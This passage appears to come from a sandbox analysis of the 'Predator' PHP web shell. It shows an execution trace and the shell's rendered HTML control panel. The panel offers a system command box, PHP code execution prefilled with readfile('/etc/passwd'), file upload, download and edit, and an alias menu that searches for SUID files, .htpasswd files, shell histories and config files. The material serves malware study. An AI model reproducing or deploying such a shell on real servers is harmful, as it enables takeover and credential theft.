--progress=TYPE select progress gauge type', 38 => ' --show-progress display the progress bar in any verbosity mode', 39 => ' -N, --timestamping don\'t re-retrieve files unless newer than', 40 => ' local', 41 => ' --no-if-modified-since don\'t use conditional if-modified-since get', 42 => ' requests in timestamping mode', 43 => ' --no-use-server-timestamps don\'t set the local file\'s timestamp by', 44 => ' the one on the server', 45 => ' -S, --server-response print server response', 46 => ' --spider don\'t download anything', 47 => ' -T, --timeout=SECONDS set all timeout values to SECONDS', 48 => ' --dns-timeout=SECS set the DNS lookup timeout to SECS', 49 => ' --connect-timeout=SECS set the connect timeout to SECS', 50 => ' --read-timeout=SECS set the read timeout to SECS', 51 => ' -w, --wait=SECONDS wait SECONDS between retrievals', 52 => ' (applies if more then 1 URL is to be retrieved)', 53 => ' --waitretry=SECONDS wait 1..SECONDS between retries of a retrieval', 54 => ' (applies if more then 1 URL is to be retrieved)', 55 => ' --random-wait wait from 0.5*WAIT...1.5*WAIT secs between retrievals', 56 => ' (applies if more then 1 URL is to be retrieved)', 57 => ' --no-proxy explicitly turn off proxy', 58 => ' -Q, --quota=NUMBER set retrieval quota to NUMBER', 59 => ' --bind-address=ADDRESS bind to ADDRESS (hostname or IP) on local host', 60 => ' --limit-rate=RATE limit download rate to RATE', 61 => ' --no-dns-cache disable caching DNS lookups', 62 => ' --restrict-file-names=OS restrict chars in file names to ones OS allows', 63 => ' --ignore-case ignore case when matching files/directories', 64 => ' -4, --inet4-only connect only to IPv4 addresses', 65 => ' -6, --inet6-only connect only to IPv6 addresses', 66 => ' --prefer-family=FAMILY connect first to addresses of specified family,', 67 => ' one of IPv6, IPv4, or none', 68 => ' --user=USER set both ftp and http user to USER', 69 => ' --password=PASS set both ftp and http password to PASS', 70 => ' --ask-password prompt for passwords', 71 => ' --use-askpass=COMMAND specify credential handler for requesting', 72 => ' username and password. If no COMMAND is', 73 => ' specified the WGET_ASKPASS or the SSH_ASKPASS', 74 => ' environment variable is used.', 75 => ' --no-iri turn off IRI support', 76 => ' --local-encoding=ENC use ENC as the local encoding for IRIs', 77 => ' --remote-encoding=ENC use ENC as the default remote encoding', 78 => ' --unlink remove file before clobber', 79 => ' --xattr turn on storage of metadata in extended file attributes', 80 => '', 81 => 'Directories:', 82 => ' -nd, --no-directories don\'t create directories', 83 => ' -x, --force-directories force creation of directories', 84 => ' -nH, --no-host-directories don\'t create host directories', 85 => ' --protocol-directories use protocol name in directories', 86 => ' -P, --directory-prefix=PREFIX save files to PREFIX/..', 87 => ' --cut-dirs=NUMBER ignore NUMBER remote directory components', 88 => '', 89 => 'HTTP options:', 90 => ' --http-user=USER set http user to USER', 91 => ' --http-password=PASS set http password to PASS', 92 => ' --no-cache disallow server-cached data', 93 => ' --default-page=NAME change the default page name (normally', 94 => ' this is \'index.html\'.)', 95 => ' -E, --adjust-extension save HTML/CSS documents with proper extensions', 96 => ' --ignore-length ignore \'Content-Length\' header field', 97 => ' --header=STRING insert STRING among the headers', 98 => ' --compression=TYPE choose compression, one of auto, gzip and none. (default: none)', 99 => ' --max-redirect maximum redirections allowed per page', 100 => ' --proxy-user=USER set USER as proxy username', 101 => ' --proxy-password=PASS set PASS as proxy password', 102 => ' --referer=URL include \'Referer: URL\' header in HTTP request', 103 => ' --save-headers save the HTTP headers to file', 104 => ' -U, --user-agent=AGENT identify as AGENT instead of Wget/VERSION', 105 => ' --no-http-keep-alive disable HTTP keep-alive (persistent connections)', 106 => ' --no-cookies don\'t use cookies', 107 => ' --load-cookies=FILE load cookies from FILE before session', 108 => ' --save-cookies=FILE save cookies to FILE after session', 109 => ' --keep-session-cookies load and save session (non-permanent) cookies', 110 => ' --post-data=STRING use the POST method; send STRING as the data', 111 => ' --post-file=FILE use the POST method; send contents of FILE', 112 => ' --method=HTTPMethod use method "HTTPMethod" in the request', 113 => ' --body-data=STRING send STRING as data. --method MUST be set', 114 => ' --body-file=FILE send contents of FILE. --method MUST be set', 115 => ' --content-disposition honor the Content-Disposition header when', 116 => ' choosing local file names (EXPERIMENTAL)', 117 => ' --content-on-error output the received content on server errors', 118 => ' --auth-no-challenge send Basic HTTP authentication information', 119 => ' without first waiting for the server\'s', 120 => ' challenge', 121 => '', 122 => 'HTTPS (SSL/TLS) options:', 123 => ' --secure-protocol=PR choose secure protocol, one of auto, SSLv2,', 124 => ' SSLv3, TLSv1, TLSv1_1, TLSv1_2 and PFS', 125 => ' --https-only only follow secure HTTPS links', 126 => ' --no-check-certificate don\'t validate the server\'s certificate', 127 => ' --certificate=FILE client certificate file', ...]
4 50 1 0.010128 660736
4 50 R 'GNU Wget 1.21.2, a non-interactive network retriever.\nUsage: wget [OPTION]... [URL]...\n\nMandatory arguments to long options are mandatory for short options too.\n\nStartup:\n -V, --version display the version of Wget and exit\n -h, --help print this help\n -b, --background go to background after startup\n -e, --execute=COMMAND execute a `.wgetrc\'-style command\n\nLogging and input file:\n -o, --output-file=FILE log messag'
3 A /var/www/html/uploads/Predator.php 453 $out = 'GNU Wget 1.21.2, a non-interactive network retriever.\nUsage: wget [OPTION]... [URL]...\n\nMandatory arguments to long options are mandatory for short options too.\n\nStartup:\n -V, --version display the version of Wget and exit\n -h, --help print this help\n -b, --background go to background after startup\n -e, --execute=COMMAND execute a `.wgetrc\'-style command\n\nLogging and input file:\n -o, --output-file=FILE log messag'
3 47 1 0.010219 628288
3 47 R 'GNU Wget 1.21.2, a non-interactive network retriever.\nUsage: wget [OPTION]... [URL]...\n\nMandatory arguments to long options are mandatory for short options too.\n\nStartup:\n -V, --version display the version of Wget and exit\n -h, --help print this help\n -b, --background go to background after startup\n -e, --execute=COMMAND execute a `.wgetrc\'-style command\n\nLogging and input file:\n -o, --output-file=FILE log messag'
2 46 1 0.010265 611904
2 46 R '<font size=2 color=green>ON</font>'
2 51 0 0.010285 611904 testfetch 1 /var/www/html/uploads/Predator.php 807 0
3 52 0 0.010298 611904 ex 1 /var/www/html/uploads/Predator.php 368 1 'fetch --help'
3 A /var/www/html/uploads/Predator.php 447 $out = ''
4 53 0 0.010322 611904 function_exists 0 /var/www/html/uploads/Predator.php 450 1 'exec'
4 53 1 0.010337 611944
4 53 R TRUE
4 54 0 0.010351 611928 exec 0 /var/www/html/uploads/Predator.php 452 2 'fetch --help' ''
4 54 1 0.011098 612048
4 54 R ''
4 55 0 0.011120 611984 join 0 /var/www/html/uploads/Predator.php 453 2 '\n' []
4 55 1 0.011134 612048
4 55 R ''
3 A /var/www/html/uploads/Predator.php 453 $out = ''
3 52 1 0.011159 611904
3 52 R ''
2 51 1 0.011172 611904
2 51 R '<font size=2 color=red>OFF</font>'
2 56 0 0.011190 611904 testlynx 1 /var/www/html/uploads/Predator.php 810 0
3 57 0 0.011201 611904 ex 1 /var/www/html/uploads/Predator.php 348 1 'lynx --help'
3 A /var/www/html/uploads/Predator.php 447 $out = ''
4 58 0 0.011224 611904 function_exists 0 /var/www/html/uploads/Predator.php 450 1 'exec'
4 58 1 0.011237 611944
4 58 R TRUE
4 59 0 0.011250 611928 exec 0 /var/www/html/uploads/Predator.php 452 2 'lynx --help' ''
4 59 1 0.012070 612048
4 59 R ''
4 60 0 0.012095 611984 join 0 /var/www/html/uploads/Predator.php 453 2 '\n' []
4 60 1 0.012110 612048
4 60 R ''
3 A /var/www/html/uploads/Predator.php 453 $out = ''
3 57 1 0.012135 611904
3 57 R ''
2 56 1 0.012149 611904
2 56 R '<font size=2 color=red>OFF</font>'
2 61 0 0.012167 611904 testperl 1 /var/www/html/uploads/Predator.php 833 0
3 62 0 0.012179 611904 ex 1 /var/www/html/uploads/Predator.php 338 1 'perl -h'
3 A /var/www/html/uploads/Predator.php 447 $out = ''
4 63 0 0.012202 611904 function_exists 0 /var/www/html/uploads/Predator.php 450 1 'exec'
4 63 1 0.012215 611944
4 63 R TRUE
4 64 0 0.012228 611928 exec 0 /var/www/html/uploads/Predator.php 452 2 'perl -h' ''
4 64 1 0.013849 617648
4 64 R ''
4 65 0 0.013872 617584 join 0 /var/www/html/uploads/Predator.php 453 2 '\n' [0 => '', 1 => 'Usage: perl [switches] [--] [programfile] [arguments]', 2 => ' -0[octal/hexadecimal] specify record separator (\\0, if no argument)', 3 => ' -a autosplit mode with -n or -p (splits $_ into @F)', 4 => ' -C[number/list] enables the listed Unicode features', 5 => ' -c check syntax only (runs BEGIN and CHECK blocks)', 6 => ' -d[t][:MOD] run program under debugger or module Devel::MOD', 7 => ' -D[number/letters] set debugging flags (argument is a bit mask or alphabets)', 8 => ' -e commandline one line of program (several -e\'s allowed, omit programfile)', 9 => ' -E commandline like -e, but enables all optional features', 10 => ' -f don\'t do $sitelib/sitecustomize.pl at startup', 11 => ' -F/pattern/ split() pattern for -a switch (//\'s are optional)', 12 => ' -i[extension] edit <> files in place (makes backup if extension supplied)', 13 => ' -Idirectory specify @INC/#include directory (several -I\'s allowed)', 14 => ' -l[octnum] enable line ending processing, specifies line terminator', 15 => ' -[mM][-]module execute "use/no module..." before executing program', 16 => ' -n assume "while (<>) { ... }" loop around program', 17 => ' -p assume loop like -n but print line also, like sed', 18 => ' -s enable rudimentary parsing for switches after programfile', 19 => ' -S look for programfile using PATH environment variable', 20 => ' -t enable tainting warnings', 21 => ' -T enable tainting checks', 22 => ' -u dump core after parsing program', 23 => ' -U allow unsafe operations', 24 => ' -v print version, patchlevel and license', 25 => ' -V[:configvar] print configuration summary (or a single Config.pm variable)', 26 => ' -w enable many useful warnings', 27 => ' -W enable all warnings', 28 => ' -x[directory] ignore text before #!perl line (optionally cd to directory)', 29 => ' -X disable all warnings', 30 => '', 31 => 'Run \'perldoc perl\' for more help with Perl.', 32 => '']
4 65 1 0.013954 619696
4 65 R '\nUsage: perl [switches] [--] [programfile] [arguments]\n -0[octal/hexadecimal] specify record separator (\\0, if no argument)\n -a autosplit mode with -n or -p (splits $_ into @F)\n -C[number/list] enables the listed Unicode features\n -c check syntax only (runs BEGIN and CHECK blocks)\n -d[t][:MOD] run program under debugger or module Devel::MOD\n -D[number/letters] set debugging flags (argument is a bit mask or alphabets)\n -e commandline '
3 A /var/www/html/uploads/Predator.php 453 $out = '\nUsage: perl [switches] [--] [programfile] [arguments]\n -0[octal/hexadecimal] specify record separator (\\0, if no argument)\n -a autosplit mode with -n or -p (splits $_ into @F)\n -C[number/list] enables the listed Unicode features\n -c check syntax only (runs BEGIN and CHECK blocks)\n -d[t][:MOD] run program under debugger or module Devel::MOD\n -D[number/letters] set debugging flags (argument is a bit mask or alphabets)\n -e commandline '
3 62 1 0.014023 613952
3 62 R '\nUsage: perl [switches] [--] [programfile] [arguments]\n -0[octal/hexadecimal] specify record separator (\\0, if no argument)\n -a autosplit mode with -n or -p (splits $_ into @F)\n -C[number/list] enables the listed Unicode features\n -c check syntax only (runs BEGIN and CHECK blocks)\n -d[t][:MOD] run program under debugger or module Devel::MOD\n -D[number/letters] set debugging flags (argument is a bit mask or alphabets)\n -e commandline '
2 61 1 0.014055 611904
2 61 R '<font size=2 color=green>ON</font>'
2 66 0 0.014073 611904 date 0 /var/www/html/uploads/Predator.php 836 1 'H:i'
2 66 1 0.014133 614256
2 66 R '21:31'
2 67 0 0.014150 613968 date 0 /var/www/html/uploads/Predator.php 839 1 'd-m-Y'
2 67 1 0.014183 614256
2 67 R '12-02-2023'
2 68 0 0.014216 613968 getcwd 0 /var/www/html/uploads/Predator.php 842 0
2 68 1 0.014230 614016
2 68 R '/var/www/html/uploads'
2 69 0 0.014260 614016 disk_total_space 0 /var/www/html/uploads/Predator.php 842 1 '/var/www/html/uploads'
2 69 1 0.014279 614048
2 69 R 232015802368
2 70 0 0.014293 613968 view_size 1 /var/www/html/uploads/Predator.php 842 1 232015802368
3 71 0 0.014308 613968 round 0 /var/www/html/uploads/Predator.php 359 1 21608.155441284
3 71 1 0.014321 614000
3 71 R 21608
2 A /var/www/html/uploads/Predator.php 359 $size = '216.08 GB'
2 70 1 0.014348 614008
2 70 R '216.08 GB'
2 72 0 0.014380 613968 getcwd 0 /var/www/html/uploads/Predator.php 845 0
2 72 1 0.014395 614016
2 72 R '/var/www/html/uploads'
2 73 0 0.014409 614016 diskfreespace 0 /var/www/html/uploads/Predator.php 845 1 '/var/www/html/uploads'
2 73 1 0.014425 614048
2 73 R 198173020160
2 74 0 0.014438 613968 view_size 1 /var/www/html/uploads/Predator.php 845 1 198173020160
3 75 0 0.014451 613968 round 0 /var/www/html/uploads/Predator.php 359 1 18456.300735474
3 75 1 0.014464 614000
3 75 R 18456
2 A /var/www/html/uploads/Predator.php 359 $size = '184.56 GB'
2 74 1 0.014490 614008
2 74 R '184.56 GB'
2 76 0 0.014504 613968 shell 1 /var/www/html/uploads/Predator.php 860 0
3 77 0 0.014526 613968 ex 1 /var/www/html/uploads/Predator.php 559 1 'ls -la'
3 A /var/www/html/uploads/Predator.php 447 $out = ''
4 78 0 0.014549 613968 function_exists 0 /var/www/html/uploads/Predator.php 450 1 'exec'
4 78 1 0.014562 614008
4 78 R TRUE
4 79 0 0.014575 613992 exec 0 /var/www/html/uploads/Predator.php 452 2 'ls -la' ''
4 79 1 0.016247 615096
4 79 R '-rwxr-xr-x 1 root root 57 Feb 12 21:31 prepend.php'
4 80 0 0.016285 614936 join 0 /var/www/html/uploads/Predator.php 453 2 '\n' [0 => 'total 64', 1 => 'drwxrwxrwx 3 root root 4096 Feb 12 21:31 .', 2 => 'drwxrwxrwx 3 root root 4096 Feb 12 21:31 ..', 3 => '-rw-r--r-- 1 root root 64 Feb 12 21:31 .htaccess', 4 => '-rw-rw-r-- 1 osboxes osboxes 43704 Feb 12 21:31 Predator.php', 5 => 'drwxrwxrwx 2 root root 4096 Feb 12 21:31 data', 6 => '-rwxr-xr-x 1 root root 57 Feb 12 21:31 prepend.php']
4 80 1 0.016322 615384
4 80 R 'total 64\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 .\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 ..\n-rw-r--r-- 1 root root 64 Feb 12 21:31 .htaccess\n-rw-rw-r-- 1 osboxes osboxes 43704 Feb 12 21:31 Predator.php\ndrwxrwxrwx 2 root root 4096 Feb 12 21:31 data\n-rwxr-xr-x 1 root root 57 Feb 12 21:31 prepend.php'
3 A /var/www/html/uploads/Predator.php 453 $out = 'total 64\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 .\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 ..\n-rw-r--r-- 1 root root 64 Feb 12 21:31 .htaccess\n-rw-rw-r-- 1 osboxes osboxes 43704 Feb 12 21:31 Predator.php\ndrwxrwxrwx 2 root root 4096 Feb 12 21:31 data\n-rwxr-xr-x 1 root root 57 Feb 12 21:31 prepend.php'
3 77 1 0.016383 614352
3 77 R 'total 64\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 .\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 ..\n-rw-r--r-- 1 root root 64 Feb 12 21:31 .htaccess\n-rw-rw-r-- 1 osboxes osboxes 43704 Feb 12 21:31 Predator.php\ndrwxrwxrwx 2 root root 4096 Feb 12 21:31 data\n-rwxr-xr-x 1 root root 57 Feb 12 21:31 prepend.php'
2 A /var/www/html/uploads/Predator.php 559 $u = 'total 64\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 .\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 ..\n-rw-r--r-- 1 root root 64 Feb 12 21:31 .htaccess\n-rw-rw-r-- 1 osboxes osboxes 43704 Feb 12 21:31 Predator.php\ndrwxrwxrwx 2 root root 4096 Feb 12 21:31 data\n-rwxr-xr-x 1 root root 57 Feb 12 21:31 prepend.php'
2 76 1 0.016440 614352
2 76 R 'total 64\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 .\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 ..\n-rw-r--r-- 1 root root 64 Feb 12 21:31 .htaccess\n-rw-rw-r-- 1 osboxes osboxes 43704 Feb 12 21:31 Predator.php\ndrwxrwxrwx 2 root root 4096 Feb 12 21:31 data\n-rwxr-xr-x 1 root root 57 Feb 12 21:31 prepend.php'
2 81 0 0.016479 614352 htmlspecialchars 0 /var/www/html/uploads/Predator.php 860 1 'total 64\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 .\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 ..\n-rw-r--r-- 1 root root 64 Feb 12 21:31 .htaccess\n-rw-rw-r-- 1 osboxes osboxes 43704 Feb 12 21:31 Predator.php\ndrwxrwxrwx 2 root root 4096 Feb 12 21:31 data\n-rwxr-xr-x 1 root root 57 Feb 12 21:31 prepend.php'
2 81 1 0.016514 615152
2 81 R 'total 64\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 .\ndrwxrwxrwx 3 root root 4096 Feb 12 21:31 ..\n-rw-r--r-- 1 root root 64 Feb 12 21:31 .htaccess\n-rw-rw-r-- 1 osboxes osboxes 43704 Feb 12 21:31 Predator.php\ndrwxrwxrwx 2 root root 4096 Feb 12 21:31 data\n-rwxr-xr-x 1 root root 57 Feb 12 21:31 prepend.php'
2 82 0 0.016554 613968 edit 1 /var/www/html/uploads/Predator.php 861 0
2 82 1 0.016572 613968
2 82 R NULL
2 83 0 0.016592 613968 pwd 1 /var/www/html/uploads/Predator.php 905 0
3 84 0 0.016609 613968 chdir 0 /var/www/html/uploads/Predator.php 600 1 NULL
3 84 1 0.016636 614008
3 84 R FALSE
3 85 0 0.016654 613968 getcwd 0 /var/www/html/uploads/Predator.php 601 0
3 85 1 0.016670 614016
3 85 R '/var/www/html/uploads'
2 A /var/www/html/uploads/Predator.php 601 $cwd = '/var/www/html/uploads'
3 86 0 0.016705 614016 strrpos 0 /var/www/html/uploads/Predator.php 602 2 '/var/www/html/uploads' '/'
3 86 1 0.016723 614088
3 86 R 13
2 A /var/www/html/uploads/Predator.php 602 $u = 13
2 83 1 0.016755 614016
2 83 R '/var/www/html/uploads/'
2 87 0 0.016775 613968 pwd 1 /var/www/html/uploads/Predator.php 917 0
3 88 0 0.016792 613968 chdir 0 /var/www/html/uploads/Predator.php 600 1 NULL
3 88 1 0.016815 614008
3 88 R FALSE
3 89 0 0.016832 613968 getcwd 0 /var/www/html/uploads/Predator.php 601 0
3 89 1 0.016848 614016
3 89 R '/var/www/html/uploads'
2 A /var/www/html/uploads/Predator.php 601 $cwd = '/var/www/html/uploads'
3 90 0 0.016881 614016 strrpos 0 /var/www/html/uploads/Predator.php 602 2 '/var/www/html/uploads' '/'
3 90 1 0.016897 614088
3 90 R 13
2 A /var/www/html/uploads/Predator.php 602 $u = 13
2 87 1 0.016927 614016
2 87 R '/var/www/html/uploads/'
2 91 0 0.017129 613968 pwd 1 /var/www/html/uploads/Predator.php 931 0
3 92 0 0.017148 613968 chdir 0 /var/www/html/uploads/Predator.php 600 1 NULL
3 92 1 0.017172 614008
3 92 R FALSE
3 93 0 0.017190 613968 getcwd 0 /var/www/html/uploads/Predator.php 601 0
3 93 1 0.017206 614016
3 93 R '/var/www/html/uploads'
2 A /var/www/html/uploads/Predator.php 601 $cwd = '/var/www/html/uploads'
3 94 0 0.017239 614016 strrpos 0 /var/www/html/uploads/Predator.php 602 2 '/var/www/html/uploads' '/'
3 94 1 0.017257 614088
3 94 R 13
2 A /var/www/html/uploads/Predator.php 602 $u = 13
2 91 1 0.017287 614016
2 91 R '/var/www/html/uploads/'
1 3 1 0.017534 622160
0.017594 481632
TRACE END [2023-02-13 00:32:25.222947]
Generated HTML code
<html><head>
<title>.::Predator::.</title>
<meta http-equiv="Content-Type" content="text/html; charset=CP866">
<style type="text/css">
.ta {background: #333333; border:1px solid #666666; color: #FFFFFF;}
.bt {border: 1px solid #666666;background: #333333;font-weight:bold;}
.td1 {border:2px solid #000000;}
.td2 {border:1px solid #000000;}
.ram {border:1px solid #666666;background:#222222;}
body { scrollbar-base-color: #333333}
</style>
<script>
function kill()
{
var y;
y = confirm('Are you really want to kill shell?');
if(y == true)
{
document.location = '?kill=yes';
}
}
</script>
</head>
<body bgcolor="#000000">
<center><table width="90%" cellpadding="0" cellspacing="0" style="border: 1px solid #666666">
<tbody><tr><td width="100%" height="70" bgcolor="#333333" style="border-bottom: 2px solid #666666" valign="top">
<table valign="top">
<tbody><tr><td valign="top">
<table valign="center" class="ram">
<tbody><tr><td width="5%" align="right">
<font size="2" color="#888888">System:</font>
</td>
<td width="100%">
<font size="2" color="red"><b>Linux 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023</b></font>
</td></tr>
<tr><td width="5%" align="right">
<font size="2" color="#888888">Server:</font>
</td>
<td width="100%">
<font size="2" color="red"><b>Apache/2.4.52 (Ubuntu)</b></font>
</td></tr>
<tr><td width="5%" align="right">
<font size="2" color="#888888">User:</font>
</td>
<td width="100%">
<font size="2" color="red"><b>uid=33(www-data) gid=33(www-data) groups=33(www-data)</b></font>
</td></tr>
<tr><td width="5%" align="right">
<font size="2" color="#888888">pwd:</font>
</td>
<td width="100%">
<font size="2" color="red"><b>/var/www/html/</b></font>
</td></tr>
</tbody></table>
</td>
<td width="13%" valign="center" align="center">
<table width="100%" height="100%" cellpadding="0" cellspacing="0"><tbody><tr><td width="100%" height="100%">
<center>
<a href="http://h0ld-up.info"><table cellpadding="2" cellspacing="2" style="border:1px solid #666666;background:#444444">
<tbody><tr><td><font size="2" color="#999999">
<center><b>.::h0ld-up-team::.<br>web-shell</b></center>
</font></td></tr></tbody></table></a></center>
</td></tr><tr><td height="5"></td></tr><tr><td>
<center>
<input type="submit" style="border:1px solid #666666;background: darkred;font-weight:bold;" value=" Kill Shell " onclick="kill()">
</center>
</td></tr></tbody></table>
</td>
<td class="ram" width="45%" valign="center" align="center">
<table cellpadding="0" cellspacing="0">
<tbody><tr><td>
<table valign="top" cellpadding="0" cellspacing="0">
<tbody><tr><td align="right">
<font size="2" color="#888888">PHP-version:</font>
</td></tr>
<tr><td align="right">
<font size="2" color="#888888">MySQL:</font>
</td></tr>
<tr><td align="right">
<font size="2" color="#888888">MSSQL:</font>
</td></tr>
<tr><td align="right">
<font size="2" color="#888888">PostgreSQL:</font>
</td></tr>
<tr><td align="right">
<font size="2" color="#888888">Oracle:</font>
</td></tr>
</tbody></table>
</td><td>
<table valign="top" cellpadding="0" cellspacing="0">
<tbody><tr><td>
<b><font size="2" color="red">7.2.34-37+ubuntu22.04.1+deb.sury.org+1</font></b>
</td></tr>
<tr><td>
<b><font size="2" color="red">OFF</font></b>
</td></tr>
<tr><td>
<b><font size="2" color="red">OFF</font></b>
</td></tr>
<tr><td>
<b><font size="2" color="red">OFF</font></b>
</td></tr>
<tr><td>
<b><font size="2" color="red">OFF</font></b>
</td></tr>
</tbody></table>
</td><td width="4%"></td>
<td valign="top"><table cellpadding="0" cellspacing="0" valign="top">
<tbody><tr><td valign="top" align="right">
<font color="#888888" size="2">Safe_mode:</font>
</td></tr>
<tr><td valign="top" align="right">
<font color="#888888" size="2">cURL:</font>
</td></tr>
<tr><td valign="top" align="right">
<font color="#888888" size="2">wget:</font>
</td></tr>
<tr><td valign="top" align="right">
<font color="#888888" size="2">fetch:</font>
</td></tr>
<tr><td valign="top" align="right">
<font color="#888888" size="2">lynx:</font>
</td></tr>
</tbody></table></td>
<td valign="top"><table cellpadding="0" cellspacing="0" valign="top">
<tbody><tr><td valign="top">
<b><font size="2" color="red">OFF</font></b>
</td></tr>
<tr><td valign="top">
<b><font size="2" color="green">ON</font></b>
</td></tr>
<tr><td valign="top">
<b><font size="2" color="green">ON</font></b>
</td></tr>
<tr><td valign="top">
<b><font size="2" color="red">OFF</font></b>
</td></tr>
<tr><td valign="top">
<b><font size="2" color="red">OFF</font></b>
</td></tr>
</tbody></table></td>
<td width="4%"></td>
<td valign="top"><table cellpadding="0" cellspacing="0" valign="top">
<tbody><tr><td valign="top" align="right">
<font color="#888888" size="2">Perl:</font>
</td></tr>
<tr><td valign="top" align="right">
<font color="#888888" size="2">Server time:</font>
</td></tr>
<tr><td valign="top" align="right">
<font color="#888888" size="2">Server date:</font>
</td></tr>
<tr><td valign="top" align="right">
<font color="#888888" size="2">Total space:</font>
</td></tr>
<tr><td valign="top" align="right">
<font color="#888888" size="2">Free space:</font>
</td></tr>
</tbody></table></td>
<td valign="top"><table cellpadding="0" cellspacing="0" valign="top">
<tbody><tr><td valign="top">
<b><font size="2" color="green"><font size="2" color="green">ON</font></font></b>
</td></tr>
<tr><td valign="top">
<b><font size="2" color="#999999">21:31</font></b>
</td></tr>
<tr><td valign="top">
<b><font size="2" color="#999999">12-02-2023</font></b>
</td></tr>
<tr><td valign="top">
<b><font size="2" color="#999999">216.08 GB</font></b>
</td></tr>
<tr><td valign="top">
<b><font size="2" color="#999999">184.56 GB</font></b>
</td></tr>
</tbody></table></td></tr>
</tbody></table>
</td></tr>
</tbody></table>
</td></tr>
<tr><td width="100%" height="100%" bgcolor="#333333" valign="top">
<table width="100%">
<tbody><tr><td valign="top" align="center">
<table width="100%" height="200" class="td1">
<tbody><tr><td valign="top" align="left" width="50%">
<form action="" method="POST">
<input type="hidden" name="type" value="5">
<textarea cols="80" rows="13" name="value" class="ta">total 52
drwxrwxrwx 2 root root 4096 Feb 12 21:31 .
drwxrwxrwx 3 root root 4096 Feb 12 21:31 ..
-rw-rw-r-- 1 osboxes osboxes 43704 Feb 12 21:31 Predator.php
-rw-r--r-- 1 root root 0 Feb 12 21:31 beneri.se_malware_analysis</textarea></form>
</td>
<td valign="top" align="left" width="10%">
<table width="100%" height="100%" class="td2">
<form action="" method="POST"></form><tbody><tr><td valign="top" align="left" height="40%" style="border-bottom: 1px solid #000000;">
<b>.::System shell::.</b><br>
<input type="hidden" name="type" value="2">
<center><input type="text" name="value" size="35" class="ta"></center>
<!-- br--><center><input type="submit" value="Enter" style="border-top: 1px solid #333333;border-bottom: 1px solid #666666;border-right: 1px solid #666666;border-left: 1px solid #666666;background: #333333;font-weight:bold;"></center>
</td></tr>
<tr><td valign="top" align="left">
<form action="" method="POST">
<table>
<tbody><tr><td>
<b>.::PHP-code::.</b>
</td><td align="right">
<input type="submit" value="Run code" class="bt">
<input type="hidden" name="type" value="1">
</td></tr>
<tr><td colspan="2">
<textarea rows="5" cols="26" name="value" class="ta">readfile('/etc/passwd');</textarea>
</td></tr>
</tbody></table></form>
</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
<table>
<tbody><tr><td height="0"></td></tr>
</tbody></table>
<table width="100%" height="80" class="td1" valign="top">
<tbody><tr><td valign="top" align="left" width="50%">
<form action="" method="POST">
<table width="100%" height="100%" valign="top" class="td2">
<tbody><tr><td>
<b>.::PWD::.</b>
</td><td align="right">
<input type="submit" class="bt" value="cd">
<input type="hidden" name="type" value="3">
</td></tr>
<tr><td colspan="2">
<input type="text" name="value" class="ta" size="71" value="/var/www/html/">
</td></tr>
</tbody></table></form></td><td valign="top" align="left" width="50%">
<form action="" method="POST">
<table width="100%" height="100%" valign="top" class="td2">
<tbody><tr><td>
<b>.::File Edit::.</b>
</td><td align="right">
<input type="submit" class="bt" value="Edit">
<input type="hidden" name="type" value="4">
</td></tr>
<tr><td colspan="2">
<input type="text" name="value" class="ta" size="72" value="/var/www/html/">
</td></tr>
</tbody></table></form>
</td></tr>
<tr><td valign="top" align="left" width="50%">
<form action="" method="POST">
<table width="100%" height="100%" valign="top" class="td2">
<tbody><tr><td>
<b>.::Download::.</b>
</td><td align="right">
<input type="submit" class="bt" value="Download">
<input type="hidden" name="type" value="11">
</td></tr>
<tr><td colspan="2">
<input type="text" name="value" class="ta" size="71" value="/var/www/html/">
</td></tr>
</tbody></table></form></td><td valign="top" align="left" width="50%">
<form enctype="multipart/form-data" action="" method="POST">
<table width="100%" height="100%" valign="top" class="td2">
<tbody><tr><td>
<b>.::Upload::.</b>
</td><td align="right" colspan="3">
<input type="submit" class="bt" value="Upload">
<input type="hidden" name="type" value="6">
</td></tr>
<tr><td colspan="2">
<font size="2" color="#888888">New name:
<input type="text" size="15" name="newname" class="ta">
</font></td><td width="4"></td><td colspan="2">
<input type="file" name="userfile" size="28">
</td></tr>
</tbody></table></form>
</td></tr><tr><td valign="top" align="left" width="50%">
<form action="" method="POST">
<table width="100%" height="100%" valign="top" class="td2">
<tbody><tr><td>
<b>.::Alias::.</b>
</td><td align="right">
<input type="submit" class="bt" value="RUN">
<input type="hidden" name="type" value="7">
</td></tr>
<tr><td colspan="2">
<select name="value" class="ta" width="200">
<option>find apahce config file</option>
<option>find access_log files</option>
<option>find error_log files</option>
<option>find suid files</option>
<option>find suid files in current dir</option>
<option>find sgid files</option>
<option>find sgid files in current dir</option>
<option>find config.inc.php files</option>
<option>find config.inc.php files in current dir</option>
<option>find config* files</option>
<option>find config* files in current dir</option>
<option>find all writable files</option>
<option>find all writable files in current dir</option>
<option>find all writable directories</option>
<option>find all writable directories in current dir</option>
<option>find all writable directories and files</option>
<option>find all writable directories and files in current dir</option>
<option>find all service.pwd files</option>
<option>find service.pwd files in current dir</option>
<option>find all .htpasswd files</option>
<option>find .htpasswd files in current dir</option>
<option>find all .bash_history files</option>
<option>find .bash_history files in current dir</option>
<option>find all .mysql_history files</option>
<option>find .mysql_history files in current dir</option>
<option>find all .fetchmailrc files</option>
<option>find .fetchmailrc files in current dir</option>
<option>list file attributes on a Linux second extended file system</option>
<option>show opened ports</option>
<option>---------------------------------------------------------------------------------------------------------</option>
</select>
</td></tr>
</tbody></table></form></td>
<script>
function base64Encode(str)
{
var charBase64 = new Array(
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
);
var out = "";
